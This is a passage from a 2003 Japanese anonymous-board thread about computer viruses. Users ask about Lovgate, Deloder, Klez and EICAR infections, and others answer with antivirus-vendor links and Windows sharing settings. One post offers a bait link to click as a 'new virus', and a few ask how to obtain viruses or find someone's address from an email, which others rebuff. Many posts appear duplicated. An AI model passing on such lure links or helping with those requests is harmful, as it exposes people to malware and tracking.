(´-`).。oO(この手の質問って、詳細を突っ込まれると居なくなっちゃうね。何が目的の質問なんだろう…)
535 :名無しさん@お腹いっぱい。:03/03/25 18:15
感染したんじゃなくて、それで何かをしようとしていると思われ。
536 :名無しさん@お腹いっぱい。:03/03/25 19:52
>>535
なるほど・・・・
なるほど・・・・
537 :名無しさん@お腹いっぱい。:03/03/25 20:30
538 :名無しさん@お腹いっぱい。:03/03/25 20:57
>>537
糸のない釣りはできない。
糸のない釣りはできない。
539 :名無しさん@お腹いっぱい。:03/03/26 08:17
W32.HLLW.Lovgate.G@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
Backdoor.OptixPro.12.b
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.optixpro.12.b.html
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
Backdoor.OptixPro.12.b
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.optixpro.12.b.html
540 :名無しさん@お腹いっぱい。:03/03/26 11:08
age
541 :名無しさん@お腹いっぱい。:03/03/26 12:00
トロイを発見したんですよ。オンラインスキャンで。
そしたらどうすればいいんでしょうか?普通に削除
すれば解決するのでしょうか?
そしたらどうすればいいんでしょうか?普通に削除
すれば解決するのでしょうか?
542 :名無しさん@お腹いっぱい。:03/03/26 15:09
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
これに引っかかったんですけど、再インストールしか
対処方法はないのでしょうか・・・?
これに引っかかったんですけど、再インストールしか
対処方法はないのでしょうか・・・?
543 :∀:03/03/26 15:13
だれかウィルスを入手できる方法おしえてけれ
544 :名無しさん@お腹いっぱい。:03/03/26 15:14
545 :名無しさん@お腹いっぱい。:03/03/26 15:37
ウィルス対策にアンチウィルスソフトを入れるか、それともNTTのフレッツ・セーフティを導入するか迷っています。
皆さんのアドバイスを聞かせていただけないでしょうか?
http://flets.com/safety/
皆さんのアドバイスを聞かせていただけないでしょうか?
http://flets.com/safety/
546 :名無しさん@お腹いっぱい。:03/03/26 15:42
ピュアAU板をうろついていて踏んだURLでノートンが反応、警告のウインドが開きました。
ウィルス名 EICAR Test Stringです。シマンテックのページで検索したのですが、対処方法が見つかりません。
(別の所で調べたら古いタイプ?)どのように駆除したらよいでしょうか?
ちなみにそのウィルスのURLは ttp://www.eicar.org/download/eicar.com.txt です。
どなたかお願いします。
ウィルス名 EICAR Test Stringです。シマンテックのページで検索したのですが、対処方法が見つかりません。
(別の所で調べたら古いタイプ?)どのように駆除したらよいでしょうか?
ちなみにそのウィルスのURLは ttp://www.eicar.org/download/eicar.com.txt です。
どなたかお願いします。
547 :名無しさん@お腹いっぱい。:03/03/26 16:35
548 :546:03/03/26 16:48
>547
すいません。当方初心者の為、本当にわかりませんでした。
検索エンジンで調べたら、ウィルスチェッカーを試すものだとわかりました。
そういう擬似ウィルスがあるとはしらなかったもので。シマンテックに載ってないしパニくってしまって。お騒がせしました。
すいません。当方初心者の為、本当にわかりませんでした。
検索エンジンで調べたら、ウィルスチェッカーを試すものだとわかりました。
そういう擬似ウィルスがあるとはしらなかったもので。シマンテックに載ってないしパニくってしまって。お騒がせしました。
549 :名無しさん@お腹いっぱい。:03/03/26 18:00
>>545
WAN経由ならフレッツ・セーフティで防げるが、
フロッピーやCD/DVD/MO等で他人からもらったファイルがウィルスに感染していた場合
アンチウィルスソフト常駐なら反応するけど、フレッツ・セーフティだと防げないね。
WordやExcelのファイルのやりとりで感染することも多い。
そのあたりを自分で考えて決めてくらはい。
WAN経由ならフレッツ・セーフティで防げるが、
フロッピーやCD/DVD/MO等で他人からもらったファイルがウィルスに感染していた場合
アンチウィルスソフト常駐なら反応するけど、フレッツ・セーフティだと防げないね。
WordやExcelのファイルのやりとりで感染することも多い。
そのあたりを自分で考えて決めてくらはい。
550 :545:03/03/26 18:56
551 :名無しさん@お腹いっぱい。:03/03/26 19:00
おまいら、>>539 の Lovgateって、はやってませんか?
Sex in Office.rm.exe とか、いい名前ですねぇ。
Sex in Office.rm.exe とか、いい名前ですねぇ。
552 :名無しさん@お腹いっぱい。:03/03/26 23:45
あげ
553 :名無しさん@お腹いっぱい。:03/03/27 08:34
age
554 :名無しさん@お腹いっぱい。:03/03/27 09:41
555 :名無しさん@お腹いっぱい。:03/03/27 13:19
556 :名無しさん@お腹いっぱい。:03/03/27 13:42
>>555
結局メールの添付ファイルしか検知されないよね。
ファイヤーウオールは設定だけ間違えなければ、
ソフトでも十分対応できるよね。
ただ、NT系のOSじゃないと設定の仕方によっては、
アクセスが集中したときにフリーズするかも!!
結局メールの添付ファイルしか検知されないよね。
ファイヤーウオールは設定だけ間違えなければ、
ソフトでも十分対応できるよね。
ただ、NT系のOSじゃないと設定の仕方によっては、
アクセスが集中したときにフリーズするかも!!
557 :m:03/03/27 14:02
http://jsweb.muvc.net/index.html
★☆★☆★☆★☆★☆★☆★☆★☆
★☆★☆★☆★☆★☆★☆★☆★☆
558 :名無しさん@お腹いっぱい。:03/03/27 14:08
すいません ド素人に助言をください
ウイルスバスター か ノートン どっちを買うか迷ってます
くわしい方の 意見を 聞かしてください。
ウイルスバスター か ノートン どっちを買うか迷ってます
くわしい方の 意見を 聞かしてください。
559 :名無しさん@お腹いっぱい。:03/03/27 14:49
>>558
このあたり読んで自分で判断しろ。
【2003対決】バスターVSノートン ウイルス2個目
http://pc.2ch.net/test/read.cgi/sec/1041333463/
バスターVSノートン
http://pc.2ch.net/test/read.cgi/sec/1005050509/
【ノートン】インターネットセキュリティ Ver.21【2003】
http://pc.2ch.net/test/read.cgi/sec/1048433756/l50
【不具合】ウイルスバスター2003Part8【未解決】
http://pc.2ch.net/test/read.cgi/sec/1047794591/l50
このあたり読んで自分で判断しろ。
【2003対決】バスターVSノートン ウイルス2個目
http://pc.2ch.net/test/read.cgi/sec/1041333463/
バスターVSノートン
http://pc.2ch.net/test/read.cgi/sec/1005050509/
【ノートン】インターネットセキュリティ Ver.21【2003】
http://pc.2ch.net/test/read.cgi/sec/1048433756/l50
【不具合】ウイルスバスター2003Part8【未解決】
http://pc.2ch.net/test/read.cgi/sec/1047794591/l50
560 :名無しさん@お腹いっぱい。:03/03/27 17:16
age
561 :名無しさん@お腹いっぱい。:03/03/27 17:48
はじめまして。
最近ウイルス感染してしまった初心者です。
ウイルス名は「BKDR_DELODER.A」です。
事の顛末ですが、普段はウイルスバスター2003を常駐していましたが、win2000をリカバリーしてアップデートする際、DLの効率を高めるために敢えて外して行いました。アップデート終了後にバスターをインストールした際、感染が発覚しました。
バスターで駆除出来なかったため、同ソフトにて隔離・削除しましたが、それでも怖かったためもう一度リカバリーを行いました。
今度はバスターをインストールした後でアップデートを行いました。
皆さんに質問なんですが、現況で心配することはないのでしょうか?
またハッキングされてウイルスが送り込まれる可能性はあるのでしょうか?
対応法等ありましたら、是非教えて頂きたいのです。
バスターのファイアーウォールログを見たら、約2分刻みでログが増えているのでとても心配しています。
被害ですが、確認しているのはメールデータが紛失してしまった事です。
それとマイコンピュータから各ドライブの共有設定を「共有しない」に設定しても、再起動後には「共有する」に戻ってしまうことです(仕様かも
しれませんが)。
他にも被害があるかもしれませんが、私が分かる範囲ではこれだけです。
システムですが、cドライブに98でdドライブにデータ、eドライブに2000をインストールしていて、ほとんど(ネット接続は全て)2000を使用しています。
リカバリーを行ったのは2000のみで、98は行っていません。
ADSL(yahoo.BB)接続で、ルーターは取り付けていません。
ファイアーウォールソフトはバスター2003とリカバリー後にゾーンアラームをインストールしました。
初心者で長文になり誠に恐縮なんですが、皆さん宜しくお願い致します。
最近ウイルス感染してしまった初心者です。
ウイルス名は「BKDR_DELODER.A」です。
事の顛末ですが、普段はウイルスバスター2003を常駐していましたが、win2000をリカバリーしてアップデートする際、DLの効率を高めるために敢えて外して行いました。アップデート終了後にバスターをインストールした際、感染が発覚しました。
バスターで駆除出来なかったため、同ソフトにて隔離・削除しましたが、それでも怖かったためもう一度リカバリーを行いました。
今度はバスターをインストールした後でアップデートを行いました。
皆さんに質問なんですが、現況で心配することはないのでしょうか?
またハッキングされてウイルスが送り込まれる可能性はあるのでしょうか?
対応法等ありましたら、是非教えて頂きたいのです。
バスターのファイアーウォールログを見たら、約2分刻みでログが増えているのでとても心配しています。
被害ですが、確認しているのはメールデータが紛失してしまった事です。
それとマイコンピュータから各ドライブの共有設定を「共有しない」に設定しても、再起動後には「共有する」に戻ってしまうことです(仕様かも
しれませんが)。
他にも被害があるかもしれませんが、私が分かる範囲ではこれだけです。
システムですが、cドライブに98でdドライブにデータ、eドライブに2000をインストールしていて、ほとんど(ネット接続は全て)2000を使用しています。
リカバリーを行ったのは2000のみで、98は行っていません。
ADSL(yahoo.BB)接続で、ルーターは取り付けていません。
ファイアーウォールソフトはバスター2003とリカバリー後にゾーンアラームをインストールしました。
初心者で長文になり誠に恐縮なんですが、皆さん宜しくお願い致します。
562 :名無しさん@お腹いっぱい。:03/03/27 17:58
>>561
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.deloder.html
http://www.nai.com/japan/virusinfo/virD.asp?v=W32/Deloder.worm
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.deloder.html
http://www.nai.com/japan/virusinfo/virD.asp?v=W32/Deloder.worm
563 :561:03/03/27 19:47
>>562さん
ありがとうございます。
でもすいません、それは既に確認済みなんです^^;
当然感染直後に駆け込みましたよ^^;
確かに隔離・駆除は出来ましたが、その後の設定というか
対処法が知りたかったのです(上記の質問を含めて)。
宜しくお願いします。
ありがとうございます。
でもすいません、それは既に確認済みなんです^^;
当然感染直後に駆け込みましたよ^^;
確かに隔離・駆除は出来ましたが、その後の設定というか
対処法が知りたかったのです(上記の質問を含めて)。
宜しくお願いします。
564 :名無しさん@お腹いっぱい。:03/03/27 19:49
■NGワード
・質問時に使用するのは好ましくない言葉。
「初心者」
免罪符にはならない。「初心者」であることを理由にしないのならば許容範囲。
「初心者」なりにでも節度を持った行動はできるはず。
「初歩的」
そういう自覚があるのならもう少し自分で情報を集めたり試してみて欲しい。
うわべだけ丁寧に「動きません」「分かりません」とだけ言われても答えようが無い。
「探しているのですが見つかりません」
それは探し方が足りないか、下手なのか…。
それにしてもなぜそれが存在しているのを知っているのだろう?
友達から聞いたのかは知らないが、その情報を得たところに尋ねるのが一番。
そうでなければ、無いと考えるのが妥当。
「それくらいのことは分かってます」
あなたが詳しい状況を書いていないのだから、可能性があるものを挙げたのだろう。
まず自分の説明不足を理解するべき。
回答者も行間を読む必要は無い。逆に質問文に質問しよう。逆切れされない程度にな!
「誰も分からないのですか?」
そうです。あなたの質問は理解できません。
はじめてではないのに「はじめまして」?
「いつもお世話になっております」仕事なの?
「様」付けするのはいかがなものか。そんなに卑屈にならなくても…。
「Alphabet(アルファベット)全角主義」は見にくい。
ttp://www5e.biglobe.ne.jp/~sdp/software/oshietekun.html
・質問時に使用するのは好ましくない言葉。
「初心者」
免罪符にはならない。「初心者」であることを理由にしないのならば許容範囲。
「初心者」なりにでも節度を持った行動はできるはず。
「初歩的」
そういう自覚があるのならもう少し自分で情報を集めたり試してみて欲しい。
うわべだけ丁寧に「動きません」「分かりません」とだけ言われても答えようが無い。
「探しているのですが見つかりません」
それは探し方が足りないか、下手なのか…。
それにしてもなぜそれが存在しているのを知っているのだろう?
友達から聞いたのかは知らないが、その情報を得たところに尋ねるのが一番。
そうでなければ、無いと考えるのが妥当。
「それくらいのことは分かってます」
あなたが詳しい状況を書いていないのだから、可能性があるものを挙げたのだろう。
まず自分の説明不足を理解するべき。
回答者も行間を読む必要は無い。逆に質問文に質問しよう。逆切れされない程度にな!
「誰も分からないのですか?」
そうです。あなたの質問は理解できません。
はじめてではないのに「はじめまして」?
「いつもお世話になっております」仕事なの?
「様」付けするのはいかがなものか。そんなに卑屈にならなくても…。
「Alphabet(アルファベット)全角主義」は見にくい。
ttp://www5e.biglobe.ne.jp/~sdp/software/oshietekun.html
565 :名無しさん@お腹いっぱい。:03/03/27 20:07
>>564
なるほろー
なるほろー
567 :名無しさん@お腹いっぱい。:03/03/28 10:25
>>566.
がんがれ。社内のミスを社外に出さないのがプロだ。
社内で騒いでも、それで解決できたのなら何も気にしない方が良いと思う。
次に、同じ過ちを繰り返さないようにさえすれば。
私も他にはいえない恥ずかしい失態なら何度か目にしてるからw
ただ、これで大騒ぎするのはどうかと、、、
少し気をつけないと亜種が出たときに対応できないと大変なことになるよ。
今回のは拡散ワームの単調なやつだから良いけど、、、。
がんがれ。社内のミスを社外に出さないのがプロだ。
社内で騒いでも、それで解決できたのなら何も気にしない方が良いと思う。
次に、同じ過ちを繰り返さないようにさえすれば。
私も他にはいえない恥ずかしい失態なら何度か目にしてるからw
ただ、これで大騒ぎするのはどうかと、、、
少し気をつけないと亜種が出たときに対応できないと大変なことになるよ。
今回のは拡散ワームの単調なやつだから良いけど、、、。
568 :名無しさん@お腹いっぱい。:03/03/28 14:19
age
569 :名無しさん@お腹いっぱい。:03/03/28 16:05
質問です。
http://thebbs.jp/hack/1038560618.html
ここの掲示板を開いたらウイルス警告がでました。
しかしウイルスには感染してないみたいです。
ソースのぞこうと思ったら見れませんでした。
どのような仕組みになてるのかわかる方いますか?
http://thebbs.jp/hack/1038560618.html
ここの掲示板を開いたらウイルス警告がでました。
しかしウイルスには感染してないみたいです。
ソースのぞこうと思ったら見れませんでした。
どのような仕組みになてるのかわかる方いますか?
570 :名無しさん@お腹いっぱい。:03/03/28 16:06
571 :名無しさん@お腹いっぱい。:03/03/28 16:37
>>569
この板では鑑定はやらない。
勇気がなくて見られない画像解説スレpart323http://ex.2ch.net/test/read.cgi/entrance/1048763717/l50へ。
ソースにウィルスのスクリプトが書かれているため、アンチウィルスソフトが
遮断しているので見られないと思われる。見たけりゃアンチウィルスソフトを
停止させて自己責任でどうぞ。そういうURIを直リンで書き込むのは見識を疑う。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.network.e.html
掲示板の仕様によっては誤反応の可能性もある。
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/
この板では鑑定はやらない。
勇気がなくて見られない画像解説スレpart323http://ex.2ch.net/test/read.cgi/entrance/1048763717/l50へ。
ソースにウィルスのスクリプトが書かれているため、アンチウィルスソフトが
遮断しているので見られないと思われる。見たけりゃアンチウィルスソフトを
停止させて自己責任でどうぞ。そういうURIを直リンで書き込むのは見識を疑う。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.network.e.html
掲示板の仕様によっては誤反応の可能性もある。
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/
572 :chesire-cat ◆CATBCJABLA :03/03/28 18:54
>>561
管理共有。
http://www.microsoft.com/japan/enable/training/kblight/T005/8/18.htm
http://www.ipa.go.jp/security/fy10/contents/crack/research/windows2k/2-18.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;314984
おまけ1 - リモートレジストリ
http://www.microsoft.com/japan/technet/security/tools/chklist/w2kprocl.asp
http://www.atmarkit.co.jp/fwin2k/operation/iissecurity/iissecurity_05.html
おまけその2 - 匿名ユーザー(2だとブラウジングのマスタブラウザになれなくなるんで注意)
http://www.ipa.go.jp/security/fy10/contents/crack/research/windowsnt/19.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP246261
おまけその3 - Port445関連
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20021129/3/
管理共有。
http://www.microsoft.com/japan/enable/training/kblight/T005/8/18.htm
http://www.ipa.go.jp/security/fy10/contents/crack/research/windows2k/2-18.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;314984
おまけ1 - リモートレジストリ
http://www.microsoft.com/japan/technet/security/tools/chklist/w2kprocl.asp
http://www.atmarkit.co.jp/fwin2k/operation/iissecurity/iissecurity_05.html
おまけその2 - 匿名ユーザー(2だとブラウジングのマスタブラウザになれなくなるんで注意)
http://www.ipa.go.jp/security/fy10/contents/crack/research/windowsnt/19.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP246261
おまけその3 - Port445関連
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20021129/3/
573 :名無しさん@お腹いっぱい。:03/03/28 19:57
age
574 :名無しさん@お腹いっぱい。:03/03/28 22:17
age
575 :561:03/03/28 23:01
>>572
ありがとうございます^^
早速拝見したところ、正直勉強不足なためか読解力がないのか、理解出来ない
点も多々あります^^;
が、これだけ多くの情報を提示して頂いた>>572さんの行為を無駄にしないため
にも、そして自分自身を今後守っていくためにも勉強して理解していく努力を
していこうと思います。
本当にありがとうございました^^
ありがとうございます^^
早速拝見したところ、正直勉強不足なためか読解力がないのか、理解出来ない
点も多々あります^^;
が、これだけ多くの情報を提示して頂いた>>572さんの行為を無駄にしないため
にも、そして自分自身を今後守っていくためにも勉強して理解していく努力を
していこうと思います。
本当にありがとうございました^^
576 :名無しさん@お腹いっぱい。:03/03/28 23:02
当方のOS、窓XP家版使用。
買ってきたVAIOをネットに繋げて数日でXPにかかる筈のない
ウイルスW95.spacesに汚染されてしまいました。
各種ウイルス退治系の会社HPを調べた結果XPには被害が無い
そうなのですが、買って直ぐだからなんか気持ち悪いです。
DOS環境があるOSじゃないから根絶やしに駆除できないんだよね。
何か方法があったら駆除を教えてください。
買ってきたVAIOをネットに繋げて数日でXPにかかる筈のない
ウイルスW95.spacesに汚染されてしまいました。
各種ウイルス退治系の会社HPを調べた結果XPには被害が無い
そうなのですが、買って直ぐだからなんか気持ち悪いです。
DOS環境があるOSじゃないから根絶やしに駆除できないんだよね。
何か方法があったら駆除を教えてください。
577 :名無しさん@お腹いっぱい。:03/03/28 23:56
578 :名無しさん@お腹いっぱい。:03/03/28 23:58
http://www.domo2.net/bbs/image/1045173790.gif
最新のウイルス発見! 踏んでみろって!
最新のウイルス発見! 踏んでみろって!
579 :名無しさん@お腹いっぱい。:03/03/29 00:57
_, ._
( ゚ Д゚) ・・・
( ゚ Д゚) ・・・
>>567
>がんがれ。
ありがトン。ちょろりとは社外に出てしまったようではあるんですが...。
それはともかく、うちの***部はこんなんある度に過剰反応、
しかもちょっとピントがずれてる事が多くて、一般社員にかえって
迷惑を掛けてるとしか思えない... ウィルス以上に困ったもんです。
ほんとに恥ずかしいのでさげ
>がんがれ。
ありがトン。ちょろりとは社外に出てしまったようではあるんですが...。
それはともかく、うちの***部はこんなんある度に過剰反応、
しかもちょっとピントがずれてる事が多くて、一般社員にかえって
迷惑を掛けてるとしか思えない... ウィルス以上に困ったもんです。
ほんとに恥ずかしいのでさげ
581 :名無しさん@お腹いっぱい。:03/03/29 16:47
ここは日記ですね
582 :名無しさん@お腹いっぱい。:03/03/29 16:53
●質問したこと以外のツッコミがうざいんだけど。
とりあえずものを尋ねるだけのうちは「はい」と言って従っておくのが
吉だ。まだ君には反論できるだけの知識がないのだから。
●ショシンシャがうざいんですけど。
みんなはじめは初心者だ。わかることなら答えてくれ。
ただし「お人好しの回答者は馬鹿をつけあがらせる」ことをお忘れなく
とりあえずものを尋ねるだけのうちは「はい」と言って従っておくのが
吉だ。まだ君には反論できるだけの知識がないのだから。
●ショシンシャがうざいんですけど。
みんなはじめは初心者だ。わかることなら答えてくれ。
ただし「お人好しの回答者は馬鹿をつけあがらせる」ことをお忘れなく
583 :k:03/03/29 19:51
ウィルスが簡単に手にはいる方法あるそうだがおしえてくれ。
584 :名無しさん@お腹いっぱい。:03/03/29 20:20
板のトップ読んで帰れ。
585 :名無しさん@お腹いっぱい。:03/03/29 23:25
age
586 :名無しさん@お腹いっぱい。:03/03/30 02:31
質問です。
同じ日にウイルスメールが10通近く送られて来ました。
アドレスを偽るタイプのウイルスらしく、OEの「差出人」の
所に表示されている名前は全て違いました。
メールヘッダーの「Received」の部分に表示されている
ドメインとIPは全て同じでした。これは一人の人から送られて
来ていると判断して良いのでしょうか? この部分まで偽る
ウイルスってあるのでしょうか?
同じ日にウイルスメールが10通近く送られて来ました。
アドレスを偽るタイプのウイルスらしく、OEの「差出人」の
所に表示されている名前は全て違いました。
メールヘッダーの「Received」の部分に表示されている
ドメインとIPは全て同じでした。これは一人の人から送られて
来ていると判断して良いのでしょうか? この部分まで偽る
ウイルスってあるのでしょうか?
587 :名無しさん@お腹いっぱい。:03/03/30 04:56
それを聞いてどうするつもりやら
588 :名無しさん@お腹いっぱい。:03/03/30 05:29
最近REDLOFが盛り返してきたね。一時期治まりつつあったかと思いきや。
>587
あまり見ないドメインだったので、アドレス張の中で
そのドメインを持っている人に、「万が一ということも
あるのでウイルスチェックしてもらえませんか?」と
メールを出そうと思ったんですが。
3週間毎日くらい続いてるんですよ。ウイルスメール。
あまり見ないドメインだったので、アドレス張の中で
そのドメインを持っている人に、「万が一ということも
あるのでウイルスチェックしてもらえませんか?」と
メールを出そうと思ったんですが。
3週間毎日くらい続いてるんですよ。ウイルスメール。
591 :名無しさん@お腹いっぱい。:03/03/30 14:46
質問です。
Googleのページの文字が全部「□□□・・・」と表示されます。
ウイルスかと思ってTrend Micro に行ってみたら同じ用にほと
んどの文字が□になっていました。
今のところ3箇所でこのような症状が表れました。
画面のスクロールもおかしくなったりします。
これってウイルスなんでしょうか?
Googleのページの文字が全部「□□□・・・」と表示されます。
ウイルスかと思ってTrend Micro に行ってみたら同じ用にほと
んどの文字が□になっていました。
今のところ3箇所でこのような症状が表れました。
画面のスクロールもおかしくなったりします。
これってウイルスなんでしょうか?
592 :名無しさん@お腹いっぱい。:03/03/30 14:59
>>586 いいと思われ。一応ISPとかも調べておいて
しつこくくるようだったらISPに報告とかね。
しつこくくるようだったらISPに報告とかね。
>592
ありがとうございます。助かりました。
って言ってるうちにまた来ました……。
急いで対策を講じます。
本当にありがとうございました。
ありがとうございます。助かりました。
って言ってるうちにまた来ました……。
急いで対策を講じます。
本当にありがとうございました。
594 :名無しさん@お腹いっぱい。:03/03/30 22:37
知らない人から添付ファイル付きのメールが送られてきて、
そのまま、メールを開かないように削除したいんですけど、
(ホットメールの受信トレイのページでです)
チェックを入れて、削除を押せば、メールを開かないまま削除できるのでしょうか?
どなたか教えてください。
宜しくお願いします。
そのまま、メールを開かないように削除したいんですけど、
(ホットメールの受信トレイのページでです)
チェックを入れて、削除を押せば、メールを開かないまま削除できるのでしょうか?
どなたか教えてください。
宜しくお願いします。
595 :名無しさん@お腹いっぱい。:03/03/30 22:49
>>594
自分宛にテストメール送って、それで試してみりゃいいんではないのかよーこよこはまよこすか
自分宛にテストメール送って、それで試してみりゃいいんではないのかよーこよこはまよこすか
596 :594:03/03/30 23:03
597 :c:03/03/30 23:04
解決しました。
599 :名無しさん@お腹いっぱい。:03/03/31 08:12
age
600 :名無しさん@お腹いっぱい。:03/03/31 11:18
>>598
原因は何だったの?
原因は何だったの?
601 :名無しさん@お腹いっぱい。:03/03/31 14:10
age
>>600
ウインドウズのフォントキャッシュが壊れただけでした。
ウインドウズのフォントキャッシュが壊れただけでした。
603 :名無しさん@お腹いっぱい。:03/03/31 22:03
>>229とほぼ同じ状況に陥り、ネットで調べたり
ここを見た結果BKDR_DELODER.Aだろうという事がわかりました。
長くなってしまいますがご勘弁を。
一応フリーのファイヤーウォールoutpostを入れてて情報は外部には漏れてないと思います。(自信はあまりないかも)
OSは2000SP3 IE6 CATVです。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
を見て対処しました(したつもりです)
で、収まったかと思ったら、>>229のようにまた現れました。
で、また同じように対処しました。それから数日たった今は何もありません。
で、今日友人がヤフーBBに開通しました。
んで、早速ヤフーメッセンジャーで話をしして
とりあえずwindows updateしとこうということになり、彼はまずIE6をダウンして再起動して戻ってきました。
すると再起動したあとに
WinVNC:Current User Properties
というダイアログが出たそうなんです。
で、調べたところ彼も感染してたようです。
ここを見た結果BKDR_DELODER.Aだろうという事がわかりました。
長くなってしまいますがご勘弁を。
一応フリーのファイヤーウォールoutpostを入れてて情報は外部には漏れてないと思います。(自信はあまりないかも)
OSは2000SP3 IE6 CATVです。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
を見て対処しました(したつもりです)
で、収まったかと思ったら、>>229のようにまた現れました。
で、また同じように対処しました。それから数日たった今は何もありません。
で、今日友人がヤフーBBに開通しました。
んで、早速ヤフーメッセンジャーで話をしして
とりあえずwindows updateしとこうということになり、彼はまずIE6をダウンして再起動して戻ってきました。
すると再起動したあとに
WinVNC:Current User Properties
というダイアログが出たそうなんです。
で、調べたところ彼も感染してたようです。
彼がネットに繋いでからしたことは
yahooへ行く
↓
vectorへいってVBランタイムを落としてインスト
↓
http://www.studio-radish.com/tea/netspeed/で速度測定
↓
FF11のベンチマークプログラムを落とす
↓
自分とメッセンジャーで話す
↓
ファイルを転送しようとするが向こうがファイヤーウォールの中にいるためかできない
↓
自分がhttpd(1.42h)でwebサーバーたててそこからDLしてもらう
↓
IE6をダウンして再起動
です。
ちなみにhttpdによるサーバはいつも立てている訳ではありません。
友人にファイルを送る手段してごく一時的に使います。
このときoutpostの設定はhttpdの通信はすべて許可、にしていました。
これは自分がウィルスに感染したままだった為だと思うのですが、
どうすれば消えてくれるのでしょうか?上のURLの通りにやったつもりで、
消えているように見えるのですが・・・・
yahooへ行く
↓
vectorへいってVBランタイムを落としてインスト
↓
http://www.studio-radish.com/tea/netspeed/で速度測定
↓
FF11のベンチマークプログラムを落とす
↓
自分とメッセンジャーで話す
↓
ファイルを転送しようとするが向こうがファイヤーウォールの中にいるためかできない
↓
自分がhttpd(1.42h)でwebサーバーたててそこからDLしてもらう
↓
IE6をダウンして再起動
です。
ちなみにhttpdによるサーバはいつも立てている訳ではありません。
友人にファイルを送る手段してごく一時的に使います。
このときoutpostの設定はhttpdの通信はすべて許可、にしていました。
これは自分がウィルスに感染したままだった為だと思うのですが、
どうすれば消えてくれるのでしょうか?上のURLの通りにやったつもりで、
消えているように見えるのですが・・・・
あ、彼のOSも2000で、インストしたばかりです。
ネットに繋いでアプデトした矢先のことでした。
ネットに繋いでアプデトした矢先のことでした。
606 :名無しさん@お腹いっぱい。:03/04/01 02:47
Winタスクマネージャーのプロセスを見てみるとsvchost.exeが5個も動いているのですが、
これはやはりおかしいですよね?ユーザーはSYSTEMで3つ、NETWORK SERVICEとLOCAL SERVICEでひとつずつです。
これはやはりおかしいですよね?ユーザーはSYSTEMで3つ、NETWORK SERVICEとLOCAL SERVICEでひとつずつです。
607 :名無しさん@お腹いっぱい。:03/04/01 05:06
メールアドレスから住所、電話番号割り出したいのですが。
何卒何卒お願いします。緊急です。
本当に申し訳ないのですがお願いします。
何卒何卒お願いします。緊急です。
本当に申し訳ないのですがお願いします。
608 :cheshire-cat ◆CATBCJABLA :03/04/01 05:52
>>603
設定不良のパソがPersonal Fire Wallで保護されていたのに、それを外したから感染したかと。
うぃ。
http://pc.2ch.net/test/read.cgi/sec/1045816526/572
設定不良のパソがPersonal Fire Wallで保護されていたのに、それを外したから感染したかと。
うぃ。
http://pc.2ch.net/test/read.cgi/sec/1045816526/572
609 :cheshire-cat ◆CATBCJABLA :03/04/01 06:08
>>606
Svchostって「Service Host」。他のサービスを起動させるためのホストプロセス。
Te-TecnorogyってHPに良解説があったけど、閉鎖されてまったのねん。
http://homepage2.nifty.com/winfaq/wxp/network.html#1326
http://support.microsoft.com/default.aspx?scid=kb;JA;q250320
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q314056
http://homepage2.nifty.com/winfaq/wxp/trouble.html#1016
もちろん、Svchost.exeってファイルを作成しるウイルスもあります。
Svchostって「Service Host」。他のサービスを起動させるためのホストプロセス。
Te-TecnorogyってHPに良解説があったけど、閉鎖されてまったのねん。
http://homepage2.nifty.com/winfaq/wxp/network.html#1326
http://support.microsoft.com/default.aspx?scid=kb;JA;q250320
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q314056
http://homepage2.nifty.com/winfaq/wxp/trouble.html#1016
もちろん、Svchost.exeってファイルを作成しるウイルスもあります。
610 :名無しさん@お腹いっぱい。:03/04/01 08:55
>>607
お前のメアドと住所と電話番号を晒してごらん。
お前のメアドと住所と電話番号を晒してごらん。
611 :名無しさん@お腹いっぱい。:03/04/01 09:54
少し前の話だけど
知人のアドレスでKLEZのファイル付きメールが来て
知らずにダウンロードして感染してしまった。
でもその知人の所にも、知人が今までメールをやり取りした人にも
誰1人ウイルスメール(感染後に自動的にばら撒かれる感染メール)
が来てないらしい。
なんかこれ変じゃないですか?もしかして知人が?と
疑ってしまったらマズイですかね?
しばらくして、掲示板で言われもない中傷受けたし。
知人のアドレスでKLEZのファイル付きメールが来て
知らずにダウンロードして感染してしまった。
でもその知人の所にも、知人が今までメールをやり取りした人にも
誰1人ウイルスメール(感染後に自動的にばら撒かれる感染メール)
が来てないらしい。
なんかこれ変じゃないですか?もしかして知人が?と
疑ってしまったらマズイですかね?
しばらくして、掲示板で言われもない中傷受けたし。
612 :bloom:03/04/01 10:06
613 :名無しさん@お腹いっぱい。:03/04/01 10:20
trickler_4010.ex_ってファイルあったんですけど。
これはヤバいんでしょうか?
これはヤバいんでしょうか?
614 :名無しさん@お腹いっぱい。:03/04/01 12:08
こういう人にどう対処したらよいでしょう?
http://hpcgi3.nifty.com/yasuoka/ff10-2_no1/wforum.cgi?no=1228&reno=1226&oya=466&mode=msgview&page=30
http://hpcgi3.nifty.com/yasuoka/ff10-2_no1/wforum.cgi?no=1228&reno=1226&oya=466&mode=msgview&page=30
615 :名無しさん@お腹いっぱい。:03/04/01 12:21
>>613
この板では鑑定はやらないし、ファイル名だけで危険かどうか分かりません。
